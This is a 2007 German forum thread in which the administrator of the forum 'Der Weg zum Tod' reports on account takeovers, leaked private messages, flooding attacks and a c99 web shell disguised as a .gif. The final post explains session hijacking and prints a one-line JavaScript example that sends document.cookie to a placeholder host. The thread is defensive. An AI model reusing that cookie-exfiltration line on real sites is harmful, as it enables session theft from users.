Der Weg zum Tod » Der Weg zum Tod » New's » WTD Attack

WTD Attack

Anima
Liebe Mitglieder

Unser Forum wurde am 16.02.07 gehackt :-). Das heißt, das es einigen gelungen ist, das Passwort meines Account ( Anima) und mindestens ein Account eines Teammitglieds ausfindig zu machen um sich unter meinen und den des anderen Nicks anzumelden.

Die Gründe dafür sind unteranderen in diesem Thread zu erlesen:
Penisneid

Dabei wurden meine Privaten Nachrichten sowie der Interne Bereich von der entsprechenden Person(en) gesichert und werden auf folgender Domäne" www.zensiert " dessen Inhaber uns bekannt ist zum download angeboten.

Ebenso wird auf dieser Domäne in einem Beitrag darauf hingewiesen das man im besitz der Daten Bank des hiesigen Forums sei und jederzeit möglich ist, auf die Privaten Nachrichten der User zu zugreifen.
Doch dazu möchte ich euch sagen das es derzeit keinen Beweis darüber gibt das die Datenbank mit den Inhalten durch dritte Personen gesichert wurden.
Ja selbst mein Account hier im Forum wie das der Teammitgliedern ist in gewisser Sicht eingeschränkt so das wenn man mit meinem Account sich hier anmelden würde, was ja geschehen ist, es nicht möglich ist die Datenbank zu sichern.


Ich möchte euch bitten, euch nicht einschüchtern zu lassen, was ja wohl die Absicht des jenigen zu sein scheint, eure Passwörter sofort zu ändern und dabei bzw. darauf zu achten das ihr mindestens eine länge von 14 Stellen oder mehr habt ( ohne Garantie ) und das Passwort in Regelmäßigen Abständen zu erneuern. Sollte das Passwort das ihr hier hier derzeit nutz, gleich dem Passwort anderer Foren, Emails, Messenger usw sein, dann solltet ihr zur eurer Sicherheit ebenso diese Passwörter ändern. Denn nichts wäre schoener für einen Hacker ein Passwort eines anderen zu besitzen das er dann gleich mehrere Male nutzen kann.

Auch sonstige Drohungen vorerst keine Beachtung zu schenken und im Zweifel mich oder eines der Teammitglieder zu kontaktieren.

Über den weiteren Verlauf werde wir euch selbstverständlich in Kenntnis setzen doch kann ich euch jetzt schon Garantieren das wir „ Der Weg zum Tod“ Online bleiben um euch nach wie vor einen Ort geben zu können auf dem ihr euch austauschen könnt.

Was soviel heisst wie, allen Gerüchten zum trotz, dem jenigen wird es nicht gelingen das Forum zu deaktivieren bzw. euch zu berauben.
Weder der Jugendschutz noch die Polizei haben Interesse daran, das Forum zu deaktivieren noch geht von denen einen Gefahr aus.
Ganz im Gegenteil, erst letzte Woche teilte mir die Polizei etwas mit diese Aussage bekräftigen würde, doch möchte ich dazu noch nichts sagen.

Wir sind ja schliesslich keine Terroristen sondern eher Menschen mit einer besonderen Menschlichkeit die dem jenigen der dafür verantwortlich ist zu fehlen scheint.
Anima
Liebe Mitglieder

Aufgund des unerlaubten Zugriffs den wir hier hatten, habe ich einige Dinge von Grund auf ändern müssen. Zum einen ist hier so ziemlich alles aktualisiert zum andere wurden einige Einstellungen neu gesetzt aber wie ihr jetzt auch mitbekommt, fehlt dem Forum die Galerie, die User Map sowie der Chat. Über dem hinaus fehlen euch die gespeicherten Nachrichten und die Avatare aber.....habt bitte keinen Grund zur sorgen, im laufe dieser und nächste Woche, werde ich die Galerie und den Chat usw hier wieder mit anbieten und euch dann eine exakte Kopie des bisslang gewesenen Forums zu Verfügung stellen damit ihr selbst eure Nachrichten und die Avatare sowie die Bilder aus der Galerie für euch abspeichern könnt.

Glaubt mir, ich wünsche mir derzeit nichts mehr als über die letzten Tage zu berichten doch was ich jetzt auch schreiben würde, könnte derzeit das Leid nicht mindern.
Es kommt der Tag an dem ich euch mehr zu berichten habe als wie jetzt, doch bis dahin müssen wir uns gedulden.

Ich für meine Person, des Forums und deren Mitglieder, haben natürlich alles mögliche mir in der Macht stehende unternommen doch wenn ihr, Einzelt oder gemeinsam was rechtliches Unternehmen wollt dann kann das ebenso nicht verkehrt sein und endet wie es enden soll.

Ihr könnt natürlich auch darüber diskutieren in dem Maße das hier keine Real Namen und Beleidigungen stattfinden, die für euch oder fürs Forum nachteilig gewertet werden würden.

Ich sehe gerade die letzte Aktualisierung läuft dem ende entgegen so das ich jetzt gleich wieder öffnen kann und wünsche euch nur das ...smile das beste.

Ach...noch etwas bevor ich das vergesse, die Registrierung bleib aller Wahrscheinlichkeit noch diese Woche gesperrt...wird aber ganz bestimmt kommende Woche wieder möglich sein.

Grüßle
Anima
Anima
Liebe Mitglieder
derzeit wird der Server wieder einmal mit Unnützen Anfragen überlastet so das es derzeit nicht möglich ist den Foren Betrieb fortlaufend aufrecht zu erhalten. So kann es in kommender Zeit immer wieder zu einigen Ausfällen kommen. Ziel des ganzen ist wohl, das Forum dauerhaft off zu bekommen zumal zuvor gewesene Versuche mit Hilfe der Behörden fehl schlugen.
Für alle die glauben das es sich hierbei um einen Privatkrieg handelt, sind hier im Irrtum weil das hier sich gegen euch wie auch gegen mich richtet. Von Privat kann hier nicht die rede sein, das ist Öffentlich.
Wie lange das andauern wird, vermag ich gerade nicht zu sagen doch kann ich eins mit Sicherheit hier und jetzt euch sagen, das Forum wird nicht geschlossen und auch von dem Angebot hier wird nichts verändert.
Wie ich schon mal mittelte, würde ich gerne aber werde ich zzt nichts darüber schreiben. Doch es kommt der Zeitpunkt wo ich schreiben werde, weil ich dann die Sicherheit habe.
Habt also bitte Geduld, die Zeit Arbeitet für uns und alles notwendige wurde veranlasst.

Grüßle
Anima.
Anima
Mal sehen wie es weiterläuft :-)
Nein, DdoS Attacken sind nicht erlaubt und erst recht nicht dann, wenn ein Finanzieller Schaden entstanden ist, was zzt der Fall ist.

Den nicht nur ich sondern gleich mehrere Hoster waren davon betroffen. Eben die, die auf diesem Server eine Internetpräsents besitzen.

Jetzt mal ein Wort zu den jenigen der dafür verantwortlich ist, du oder ihr könnt weitermachen, ihr könnt aber auch aufhören. Das letztere wird sicherlich für euch besser für euch sprechen, zumal wir jetzt schon einige Quellen rückwirkend ab Dezember ausfindig machen konnten und entsprechende Behördliche Schritte unternahmen um die Sicherstellung der Beweismittel zu gewährleisten. Dieses ist erfolgt!!!!

Dazu sage ich nur:
http://elba317.............../4you6.php und http://85.12.18.23/................ usw.usw

Diese Adressen sage ich auch weil ich vermute das einige dazu missbraucht werden, Ahnungslos auf diese Url zu gehen, die wie gerade beschrieben, und sich und dem Forum damit nur schaden.

In diesem Sinne
Anima
Anima
Liebe Mitglieder und die es noch werden wollen. Es gibt eine gute und es gibt eine Schlechte Mitteilung was die Sicherheit des Forums betrifft.

Zur erst die Schlechte, es gibt keinen Wirklichen Schutz gegen DdoS Attacken was soviel heisst wie, wenn jemand so etwas startet, dann kann zuweilen auch der Server mal down gehen.Das betrifft nicht nur mich, sondern auch andere wie zb.Yahoo oder Ebay haben zuweilen zu kämpfen mit derartigen Attacken. Die einzigste Hilfe dagegen wäre immer einen Leistungs Stärkeren Server als die zu haben. Darum haben größere Seiten oftmals mehrere Server um das zu gewährleisten.

Kommen wir zu der guten Nachricht, die Sicherheitslücke ist gefunden was soviel heisst wie, eure Daten sind wieder sicher. Ändert bitte dringend eure Passwörter, nicht nur hier sondern überall wo ihr welche nutzt.

Aus Gründe die mir unbekannt sind, zumal der Hersteller dieser Software so was ausgeschlossen hat, ist es jemanden gelungen eine als .*gif getarnte Datei (c99.gif) die in Wirklichkeit eine Shell/ Skript ist, über die Galerie hochzuladen. Über diesen Skript konnte der jenige zugriff auf die Datenbank bekommen und alles andere ist selbsterklärend.
Tja das heisst das die Galerie Software ein Sicherheitsloch beinhaltet und ich das umgehend dem Herrsteller der Software mitteilen muss und noch mehr Schreib und Sucharbeit ( durchsuchen der Logs) nun haben werde.

Das heisst aber auch, das es hier wieder sicherer geworden ist.

In diesem Sinne
Liebes Grüßle
Anima
Anima
Allgemeine Info:
Bitte wundert euch nicht das unter whoisonline in letzter Zeit Gäste stehen, die auf Beiträgen gehen oder Beiträge editieren oder gar auf Beiträge Antworten gehen. Hierbei handelt es sich lediglich nur um den versuch was die Auswertung meiner Logdatei bestätigt hat.
Da scheint es eben Typen zu geben die mit Hilfe einer Kopie des Forums glauben zugriff aufs Forum zu bekommen. Oder glauben mich oder euch damit einschüchtern zu können.

Wichtige Info:
Auch in der Gefahr hin das ich nun um einen Trumpf leichter werde, so ist es dennoch meine Pflicht euch darüber zu Informieren das laut eines Users, als diese sich dort anmeldete, auf der Domäne auf der unsere geklauten Nachrichten sich befinden, bei ihr ein Port Scan vorgenommen wurde.

Da ich das selbst nicht nachvollziehen kann, weil ich dort nicht angemeldet bin und mich anmelden werde, möchte ich euch einfach nur darauf hinweisen das auf dieser Domäne Vorsicht geboten ist.

Wenn ihr euch unsicher seit, dort aber registriert und nach wie vor euch anmeldet, dann kann ich das gut verstehen doch könnt ihr mal in einer ganz einfachen Art und Weise Testen ob und in wie weit das auch bei euch zutrifft sofern ihr dort angemeldet seit.

Dazu geht ihr einfach in die Eingabeaufforderung und gibt mal nachdem ihr angemeldet habt, folgendes in die Eingabeauforderung mit ein:

netstat -a

Für den Fall das jetzt etwas zu sehen ist was so ähnlich lautet wie:

ms.km20704.keymachine.de oder
keymachine.de oder
sonstiges was auf keymachine deutet und das mehr als nur 2 oder 3 mal auftauchen, dann solltet ihr euch mal Gedanken darum machen bzw doch in Erwägung ziehen eine Fire wall euch anzuschaffen oder wenn vorhanden eines Routers, die Portweiterleitung zu deaktivieren.

Lieben Gruß
Anima
Anima
Liebe Mitglieder und Besucher,

das war jetzt mal so ne richtige lange Woche. Einige von....haben tatsächlich an mich gedacht und versuchten, mich umzustimmen; insofern, dass ich weniger machen soll. Doch gerade das war eben nicht möglich, denn eine Anzeige zu stellen, ja sogar eine Strafanzeige zu stellen, wenn gleich sie auch Aussicht auf Erfolg haben soll, beinhaltet auch einiges an Vorarbeit.

Und da könnt ihr euch sicher sein, diese Hausaufgaben habe ich gemacht.
Das bin ich mir, das bin ich euch vor allem schuldig.

Ich finde es gerade zu gut, das ein Jemand immer noch glaubt, dass er hierbei „ Ausspähen von Daten, das Verändern von Daten, und die Veröffentlichung von Daten, die für einen selbst nicht bestimmt waren“ sogar die Veröffentlichung eines gefälschten Schreibens“ mit einem blauen Auge davon kommt.

Nein, ich habe nichts gegen diese Person, doch hier wurden die Grenzen überschritten.

Mehr zu diesen Straftaten findet ihr hier:
http://www.rrzn.uni-hannover.de/hacking_viren-strafe.html
http://www.raut.de/Drakonische_Strafen.231.0.html
http://www.heise.de/security/news/meldung/67791


Nein nein, lasst euch nicht durcheinander bringen, wenn es hier oder da mal heißen soll, er hat ja keine Strafanzeige gestellt oder dies oder das. Was wie einzuordnen ist....in ganz kurzen Worten.

November erging durch mich eine Anzeige, da mein Name dazu missbraucht wurde, mich als Inhaber auf seinen Domänen einzutragen. Diese Anzeige rückt natürlich jetzt im weiteren Verlauf in ein anderes Licht. Darüber hinaus habe ich bis heute kein Einstellungsbescheid erhalten, so dass ich annehmen muss, das diese immer noch in den Büros der Staatsanwaltschaft und der Kripo liegt. Die Polizei hat im Allgemeinen damit nichts zu tun.

Ebenfalls im November erhielt ich eine Einstweilige Verfügung und nahm sie als solches an und entfernte die mir vorgeworfenen Inhalte.

Irgendwann im Dezember erhielt ich erneut eine Einstweilige Verfügung, über die im Mai verhandelt wird. Genauere Informationen ...für die, die es wissen wollen, nicht hier, nicht in diesem Forum. Dafür ist mir das Forum zu wichtig mit den Menschen, die sich hier als Mitglieder oder Mitleser bezeichnen.

Es gab noch eine Anzeige der Herrn....? gegen mich bzw. gegen das Forum und um ehrlich zu sein, nachdem mir gesagt wurde das bei ihnen auf dem Forum http://www.waytodeath.com alles zum besten läuft, habe ich ein paar Frage dazu beantwortet, mir meinen Teil dabei gedacht, bin dann beruhigt nach Hause gegangen.

Und jetzt, und das sehen viele auch als berechtigt, die Strafanzeige wegen den obenbenannten Punkten. Die Beweisführung sollte abgeschlossen sein, aus meiner Sicht ganz bestimmt.
Ja sogar die DdoS bzw die Flooding Attacke die uns daran gehindert haben, die Webpräsenz online zu halten, haben hoffentlich ein strafrechtliches Nachspiel.
Nicht umsonst bearbeite ich seit einigen Tagen Logdateien (reine Textdateien) die > 1Gb /Tag sind.
Nicht umsonst musste ich einen eigenen Server in Anspruch nehmen.

Bei dieser Gelegenheit möchte ich mich ganz herzlich bei dem Team von Artfiles bedanken.
Ebenso bei den vielen Mitglieder, die mich in der einen oder anderen Weise unterstützend zu mir gehalten habt. Ich möchte mich aber auch ganz herzlich bei dem Team des WTD bedanken die nach wie vor, für euch da waren.

Noch mal zu der Sicherheit hier des Forums. Sicher ist, so ganz sicher, kann man sicher nicht sein. Ich für meinen Teil habe jetzt einige Vorkehrungen treffen müssen, begonnen mit einer Neuinstallation der Foren Software und dem Sichern bzw. das Entfernen aller Dateien, wie auch dem Entfernen aller Hacks (Galerie /Map /Chat ). Wir werden im späteren Verlauf die Map und auch den Chat wiederbekommen und vielleicht auch die Galerie. Doch gerade die Galerie, mit der es möglich war, eine c99shell.php v.1.0 als *.gif Datei getarnt hoch zu laden, macht mir die größten Sorgen. Ich mein klar, eine Datei auf .gif endend, so mein Verständnis, kann nicht ausgeführt werden. Doch bei mir daheim auf dem Server konnte ich ebenso die Datei hochladen mit dem Effekt, dass der Server down ging und danach die Datei wie gewollt im Verzeichnis drin war. Vielleicht ist ja jemand dabei, der mich davon überzeugen kann, dass von eine auf gif endende Datei keine Gefahr ausgeht auch wenn es ich hierbei um eine c99shell.php v.1.0 Datei handelt. Ich mein, die Theorie ist mir schon klar, und doch bleibt ein kleiner Zweifel.

Somit beende ich jetzt einfach mal mein Geschreibsel .....

Grüßle
Anima
Anima
Zusammen Fassung der Geschehnisse.

Am 16.02.07 Vormittags gegen 09 Uhr meldete sich ein User mit meinem Account hier im Forum an. Was genau er im einzelnen getan hat, lässt sich nicht zu 100 % belegen.
Sicher ist das dieser eine Pm die ich an einer Userin schreiben wollte, per Screenshot gesichert hat und dann im Nachhinein diese Nachricht über die Annullier Funktion gelöscht hat.

In einer späteren Mail, erhielt die Mitteilung eines Users, den ich aus guten Gründen, letztes Jahr hier, des Forums verweisen habe, mit dem Vermerk:

Hallo Rolf,
unter nachfolgender URL: http://600090.at/rolf-17022007/
kannst du dir mein Schreiben von Montag an das Gericht schonmal vorab ansehen smile

Gleichzeitig fand ich dort im Verzeichnis den Screen Shot meiner Privaten Nachricht.

Bis zu dem Zeitpunkt wusste ich lediglich das sich jemand unter meinen Account angemeldet hatte. Doch im späteren Verlauf stellte wir leider fest das es einen Illegalen Zugriff auf die Datenbank gegeben haben musste.

Am 18.02.07 erfuhren wir das ein User David der gleichzeitig der Real Mensch ist, mit dem ich im Prozess stehe, auf einer Domäne, auf der er noch letztes Jahr als Inhaber, als Administrator eingeschrieben war, dann einer Userin ohne ihre Zustimmung als Administrator einschrieb und inzwischen dort ein Administrator steht der die gleiche Fax Nr wie die der seinen trägt, die Privaten Nachrichten sowie die darin enthaltende Telefon Nr und den speziell geschützen Bereich des Forums „Der Weg zum Tod“ auf der Domäne zensiert veröffentlichte.

Darauf hin schloss ich diese Domäne und reaktivierte unser altes Forum auf http://38246.rapidforum.com/ so das ich eine vollständige Neuinstallation auf waytodeath.com durch führen konnte.

Am 20.02.07 erstattete ich dann Anzeige bei der hiesigen Polizei und stellte zugleich dann fest das unser altes Forum vom Provider deaktiviert wurde auf Grund Massiver Flooding Attacks.

In der Nacht zwischen dem 20/21.02.07 erhielten wir bis zum heutigen Tag hinein Flooding Attacken auf die Domäne www.waytodeath.com die inzwischen ein Ausmaß angenommen haben das es uns nur noch schwer fällt einen Regulären Betrieb zu gewährleisten.
Hierbei sei auch zu erwähnen das erneut die Domäne http://600090.at und die http://www.asiababy.de eine rolle dabei gespielt haben. Auf den befanden sich Skripte die das Ziel hatten den Server auszulasten. Es gab natürlich auch andere Seiten und sicherlich spielt die Gesamtheit als solches eine Rolle das zu Bestzeiten wir eine Zugriffstatistik von 10000 pro Minute hatten und das natürlich unweigerlich zur Aufgabe des Servers führte.
Es kann hier nicht mehr von einer einfachen Kinderstreich Theorie gesprochen werden sondern von einer Gewalt wogegen der Gesetzgeben endlich handeln muss und die bevor stehende Gefahr darin erkennen muss.+

Frei nach dem Motto, Jagen wir ihm mal ein paar Flooding Attacken ins Haus damit wir bekommen was wir wollen.
Ja mir fällt es schwer nicht gleiches mit gleichen zu beantworten....doch eben da ist der gewisse Unterschied zwischen dir...inzwischen euch und mir. Und noch etwas, hier geht es nicht um Geld, hier geht es um User die vielleicht Morgen verstorben sind weil wir durch euch an unserer Arbeit gehindert werden. Das hier ist und bleibt ein Pro Life Forum und ihr zerstört!


Ein paar Worte in eigener Regier, es ist zu vermuten, den Grund für die Flooding Attacken an einer Stelle zu suchen, die den Schluss zu lässt das diese Attacke einzig allein das Ziel verfolgt, uns in der Öffentlichkeit zu deformieren und die Sympathie auf sich zu ziehen.
Es gibt inzwischen genügend Punkte die ich zweifelsfrei Beweisen kann das ich so wie es von dem jenigen beschrieben wurde, eben nicht gesagt haben.

Ebenso soll der Anschein gewahrt werden, das es sich hierbei um eine Private Angelegenheit handelt damit der Gesetzgeber so vermute ich, dem ganzen ein anderes Gewicht zu teilen lässt.

Hierbei möchte ich folgende Punkte gezielt erwähnen. Das Veröffentlichen von Daten die für einen nicht bestimmt waren......und gleichzeitig Daten preisgeben, die nicht nur eine Person mit einbeziehen, unter Berücksichtigung, das dies als eine Straftat verstanden wird, kann nicht damit abgetan werden, das es sich hierbei um eine Private Sache handelt.

„Ein Mensch, der im Streit sein Kontrahenten erlegt und weil zufällig die Familie mit anwesend war, die dann auch noch erledigt, wird nicht wegen des einfachen Mord oder Todschlag sondern gleich des vielfachen angeklagt.“

Es sei auch zu erwähnen, das nur durch die Veröffentlichung der Privaten Nachrichten, es dazu gekommen ist das einige User hier im Forum, Morddrohungen oder ähnliches erhalten haben.

Auch wenn es einigen Missfällt, wenn hier nicht ein Öffentlicher Druck mit einspielt, dann wird das ganze als eine ...ah ha Verhandlung abgetan.
Allein die Tatsache, das meine Anzeige von dem Tage an als ich Sie machte, knapp 14 Tage brauchte, um an der Richtigen Stelle zu landen, lässt den Schluss zu, das wenn nicht viel aus Eigeniniatitive gestartet wird, das ganze als nicht Ermittelbar eingeht in den Regalen der Justiz.

Damit meine ich nicht, das wir Dummheiten machen sollten, sondern eine jeder für sich oder gemeinsame Anzeige gegen diesen Menschen starten sollten. Jede Anzeige verursacht Arbeit und wir, sind ach die, die sie bezahlen durch die Steuern die sie uns nehmen.

Ich bin letztens gefragt worden ob wir nicht eine eigene Plattform schaffen wollen um über dieses Thema zu diskutieren. Natürlich könne wir das machen, aber nicht hier, nicht auf dieser Domäne und nicht durch mich. Ich helfe gerne und kann hier und da was dazu beitragen, mir fehlt aber die Zeit, die Lust an der Verantwortung als das ich das auch noch machen könnte.

Ich schließe jetzt dieses Thema hier in diesem Form und wünsche allen alles gute

Anima
Anima
Liebe Mitglieder, ein paar gute und schlechte Nachrichten zu diesem Thread

Nach jetzigen Kenntnis Stand hat zwar die Galerie ein Bug gehabt doch war es nicht möglich, darüber das Forum zu Hacken. Bestenfalls hätte das nur dazu geführt, das der Server abstürzt aber eben nicht darüber die Kontrolle über die Datenbank zu bekommen.

Ich gehe sogar davon aus, das dies nur dafür gedacht war, um uns auf eine Falsche Spur zu führen. Das heisst also auch, das die Galerie wieder hier ins Forum eingebunden wird.

Wir gehen inzwischen davon aus, das anhand einer Brute Force Attacke es den jenigen möglich war, die Passwörter einzelner zu erspähen und nicht so wie anfangs gedacht, die Kontrolle der Datenbank zu erhalten.

Das heisst also, das die Datenbank sich nicht im Besitzt eines anderen befindet und somit auch nicht die darin enthaltende Pm’s und Passwörter.


Die schlechte Nachricht, gegen eine Brute Force Attacke kann man sich nur insofern schützen, indem man sich komplexe Passwörter aussucht und das ohne Gewähr.Die gute Nachricht darüber.....eine deratige Attacke ist Strafbar großes Grinsen großes Grinsen

Mehr dazu findet man hier:

http://www.defense.at/security/securityp...rce-attack.html
http://www.acunetix.de/websitesecurity/authentication.htm

Meine Empfehlung, wählt bitte ein Passwort mit einer mind. Länge von 14 Zeichen und diese Zeichen so zu wählen, das es mit unterschiedlichen Zeichen und Buchstaben wie auch Groß und Klein Buchstaben als ganzes keinen Sinn ergibt.

Grüßle
Anima
Anima
Na wird es eng ....? Ist das nun der verzweifelte Versuch das Forum zur Aufgabe zu zwingen, nachdem alle anderen Versuche fehl schlugen ? Ja es wird eng.

Kaum waren wir Online, da hatt wohl jemand Ordentlich seinen Frust abladen wollen indem er mein und den von Dark Angel bezogenen Account ...gehackt hat....

Na ja, die Sessions wurden übernommen....haste toll gemacht. Machst du das noch mal ?
Oder war das doch nur heiße Luft....?

Was soll man dazu sagen, außer haste toll gemacht smile....und wieder einmal konnte wir sehen das es uns doch eigentlich gut geht.

Frei nach Schnauze, schlimmer geht’s immer.
Oder anderes gesagt jetzt erst recht....mein guter. Vielleicht habe ich ja Glück wenn ich mal mit Karl Heinz rede....ich denke du weißt wenn ich meine und wenn nicht dann macht das auch nichts....denn anderen wird es Interessieren.

Sorry liebe Mitglieder, es ist mir ein Rätsel wie es möglich ist und ganz ehrlich auf diese Untere Schiene werde ich mich nicht hinab begeben, genauso wenig werde ich das Forum schliessen oder so tun als wäre nie was geschehen. Ich weiß ich bin im Recht und er weiß oder die Wissen, sie sind es eben nicht.

Das ganze lassen wir uns teuer bezahlen.

Wie ihr seht, ich lebe noch....und ich wüßt auch nicht warum ich jetzt das Zeitliche segnen sollte, gäbe es diesen Kerl nicht...sähe die Sache ganz anders aus aber so, muss ich sogar fast schon sagen, das es ein Grund ist, am Leben zu bleiben.

Wie ich schon sagte, jetzt erst recht....und deine Lügen werden bald verfliegen....smile.
Sollte also wieder jemand sich als jemand ausgeben und behaupten ich sei Tod....dann bitte nicht traurig um mich sein sonder eher ....um...?

Und noch was mein guter, wie du siehst, habe ich diesen Thread wieder herstellen können....nicht ganz so elegant aber denn ist er wieder da und solange sich eine exakte Kopie bei mir daheim befindet, solange steuer ich dagegen und verkünde die Wahrheit die du ja nicht zu kennen scheinst. Deine Methoden mögen einige vielleicht einschüchtern....doch mich lässt das kalt.

Und das ist genau der Unterschied den du dir bewüst machen solltest

Grüßle
Anima
Anima
Leider ergab eine Überprüfung an der Foren Software, keinerlei Fehler.

Um es genau zu sagen, wir waren heute Up to Date und das nicht nur in der Software, nein auch die Datenbank habe ich daheim neu installiert und dann in mühseliger Kleinarbeit die Beiträge und die Threads sowie die User Daten mit eingepflegt.

Eine möglichkeit in aller ferne, das hier die Sesson Id übernommen wurden zumal es für die Unbekannten keinen Hinweis gab das die sich angemeldet haben und doch waren Sie mit meinem Account und einiger Teammitglieder Online.

Ich habe dahingehend dagegen noch einiges getan, ob das was bringt, darüber möchte ich noch nichts sagen.

Eins ist aber klar, das ist schon wieder eine Straftat die mir sogar per SMS bekräftigt wurde.
Bleibt also abzuwarten was der Staatsanwaltschaft dagegen unternehmen wird, ich mein es ist ja inzwischen so viele Illegales auf dieser wie soll ich sagen, möchte gern Domäne, zu finden ?

Na ja wenn jemand unseren Namen benutz um besser auf sich aufmerksam zu machen, dann fehlen mir dazu die Worte. Das stammt übrigens nicht von mir sondern fand ich selbst in einem Beitrag in dem er bekundete das er so bei google besser zu finden sei.
Anima sagt....Haste toll gemacht....

Interessant fand ich diesen Beitrag aus dem angeblich Internen Bereich wo angeblich seine Unschuld in der Fälschungs- Affäre nun bewiesen sei. Nach der heutigen Aktion soll das nun bewiesen sein?

Bewiesen ist....da hat jemand ein Gefälschtes Dokument im Umlauf gebracht ja und sogar bei ....mit diesem Gefälschten Dokument bei Gericht argumentiert bevor überhaupt auf Richtigkeit geprüft wurde.

Ich weiß nicht ob heute jemand im Internen Bereich war, der dort nicht hingehörte. Genauso gut kann es sein das auch diese so angeblichen Beweise nichts als eine Fäschung sind des Internen Bereichs smile

Zu was die Unbekannte heute fähig waren, haben wir nun ja alle gesehen....oder wie sagt man, Tote leben länger.. großes Grinsen ..ja klasse das plötzlich über den Gehackten Account von Dark Angel ein Beitrag verfasst wurde, wonach ich nun verstoben sei. . usw usw.

Das wird noch böse Ende...aber....nicht für dieses Forum Teufel
Anima
Liebe Mitglieder,

Abschließende Worte ? Ne das Thema wird uns wohl noch ein weilchen beschäftigen.
Ich kann dazu noch folgendes sagen du muss es sogar.

Was die Sicherheit hier betrifft, so kann ich mit bestimmtheit sagen, das der Server und erst recht hier die Foren Software, nicht weniger Sicher ist, als wie es bei anderen der Fall ist.

Was bleibt also ?

Ich sprach mal von Session Id übernahme. Auch wenn das möglich ist, so wäre der Aufwand viel zu Hoch und nicht immer Erfolgsversprechend zumal die Session Id gebunden an der jeweiligen Ip ist. Dazu sein aber zu sagen, eine Ip kann man fälschen.
Dennoch halte ich das jetzt für ausgeschlossen.

Eine weitere Möglichkeit wäre, das die Foren Version einen Fehler beinhaltet, der uns aber vor allem dem Hersteller nicht bekannt ist.
Ausschließen kann ich das nicht, dennoch glaube ich nicht das es daran liegt.

Dann wäre noch die Möglichkeit, das irgendwo die Cookies die bei euch, die bei mir auf dem Rechner gespeichert werden, ausgelesen und entsprechend verwertet werden. Diese Möglichkeit halte ich für das wahrscheinlichste, zumal wir in letzter Zeit ( wir hatten darüber berichtet) dahingehend getestet wurden.

Damals bekamen wir, das Team von WTD, eine Mail die wie folgt lautete:

Zitat:

das sind sehr gefährliche behauptungen: Zoloft=Sertralin!!!! z.b: Relativ häufig können unter Sertralin zentralnervöse Störungen, wie Schlaflosigkeit, Appetitlosigkeit und Schwindel, Störungen des Magen-Darm-Systems, wie Übelkeit, Erbrechen und Durchfall man muss zwar nicht alles Löschen aber es gibt doch grenzen vorallem in so einem heikelen Forum wie eurem. wäre also nicht schlecht wenn sich darum: http://www.waytodeath.com/thread.php?threadid=2909 jemand kümmert. CU



Doch die, die damals auf diesen Link klickten, kamen auf einer ganz anderen Seite (Url) als wie man vielleicht glauben könnte. Ihr könnt das selbst ausprobieren, in dem ihr auf diesen Link geht. Kein Grund zu Sorge, wenn ihr da drauf geht, bekommt ihr google.
Ich denke das es damals einzig allein dazu diente, herauszufinden in wie weit es möglich ist, uns zu schaden, uns zu hacken.

Genauso gut kann es heut immer noch sein, das ihr auf einer Web Site geht, ich will jetzt hier keine Namen nennen, viele von euch wissen, welch Domäne gemeint ist, und dort ein Skript im Hintergrund läuft das alles einsammelt das eingesammelt werden soll.


Meine Empfehlung, besucht erst gar nicht, diese Domäne....doch weiß ich genau wie ihr auch, das dies nicht realisierbar sein wird, und unter uns gesagt, es ja auch schade wäre, wenn wir auf dieser Art der Unterhaltung verzichten müssten. smile
Meine Empfehlung, achtet darauf das eure Firewall eingeschaltet ist denn bei mir war Sie gestern deaktiviert gewesen.
Achtet darauf, das ihr euch hier abmeldet und eure Cookies löscht bevor ihr euch amüsieren wollt.. großes Grinsen

In diesem Sinne, es geht weiter, jetzt erst recht und Tote leben länger
Anima
Anima
Liebe Mitglieder,

ich möchte noch mal auf meinen zuvor geschriebenen Beitrag näher eingehen zumal wir inzwischen alle Möglichkeiten ausfiltern konnten um der Ursache näher zu kommen.
Wie ich schon schrieb, die Software hier, hat keinen Fehler und auch der Server und dessen Konfiguration wird durch meinen Hoster als fehlerfrei (sicher) bezeichnet.

Was bleibt also ? Es bleibt eine Straftat und die Hoffnung eines jemanden, euch zu verängstigen und den Behörden zu verkaufen, das es sich nicht um eine Strafbare Handlung handelt in dem er versucht, das als ein Software Fehler zu verkaufen.

In Absprache mit Woltlab, meinem Hoster und einigen Personen die nichts weiteres zu tun haben, als für die Sicherheit anderer zu sorgen, bleibt als wahrscheinlichste Möglichkeit das Session Hijacking möglich.

Doch was ist das genau ? Es beginnt ganz harmlos, als ein Link hier im Forum oder in einer Mail doch auch ein besuch einer nicht besonderen Website auf direkten Wege wäre möglich.

Beispiel:

User xyz, klickt hier auf einem Link und wird geleitet auf einer Website „cookieklau.de“. Der Inhaber dieser Website, weiß jetzt das User xyz von diesem Forum zu ihn gekommen ist anhand des Referer der in der Regel mitgeliefert wird.
Mit Hilfe eines Skriptes, das kann php aber auch Java sein, kann der Inhaber der Domäne „cookieklau.de die Cookies des Users xyz auslesen.
Ein entsprechender Java Code könnt so aussehen:
( location.href = “http://domaene.xy/cookieklau.php?c=“ + escape (dokument.cookie)

Doch was steht in so einem Cookie ? Die aktuelle Session ID und mehr, der Domäne auf der sich User xyz befand.
Somit weiß jetzt der Inhaber der Domäne „cookieklau.de“ das User xyz von dieser Domäne kommt und kennt auch die Session Id und alle Inhalte des Cookies des Users xyz.

Was jetzt passiert, nennt sich Session Hijacking oder anders gesagt, derjenige der die Inhalte des Cookies kennt, könnte die Session seines Opfers übernehmen und somit der Domäne vorgaukeln das er nun der User xyz ist.

Eben genau das ist mir und einigen anderen aus dem Team des Forums am 16.02.2007 sowie am 18.02.2007 und am 16.03.2007 passiert.

Zitat:
517
Session Hijacking zu finden auf Wikipedia
Teil 1 Teil 2

Session-Hijacking Da HTTP ein verbindungsloses Protokoll ist, muss die Webanwendung selber die Identifikation eines Benutzers feststellen. Dies geschieht anhand einer Session-ID, die als Basic/Digest Authentication, Cookie, URL-Rewriting oder HTTP-Form-Parameter (GET oder POST) jedem Request mitgegeben wird. Beim Session-Hijacking versucht der Angreifer Kenntnis von der Session-ID des Benutzers zu erlangen, um sich dann selber als sein Opfer auszugeben und mit dessen Rechten auf die Webanwendung zuzugreifen.


Die Auswertung der Log Dateien bekräftigen diese Aussage wie auch die Überprüfung des ganzen.

Was heisst das für euch ? Lasst euch keine Cookies Klauen.....meldet euch lieber vorher hier ab wenn ihr auf Websites gehen wollt die Kritisch sein könnten, löscht regelmäßig eure Cookies und glaubt nicht alles, was ein anderer über die Sicherheit des Forums euch verkaufen möchte. Es sollte bekannt sein, das ein jemand versucht, mit der Angst der User hier zu spielen.

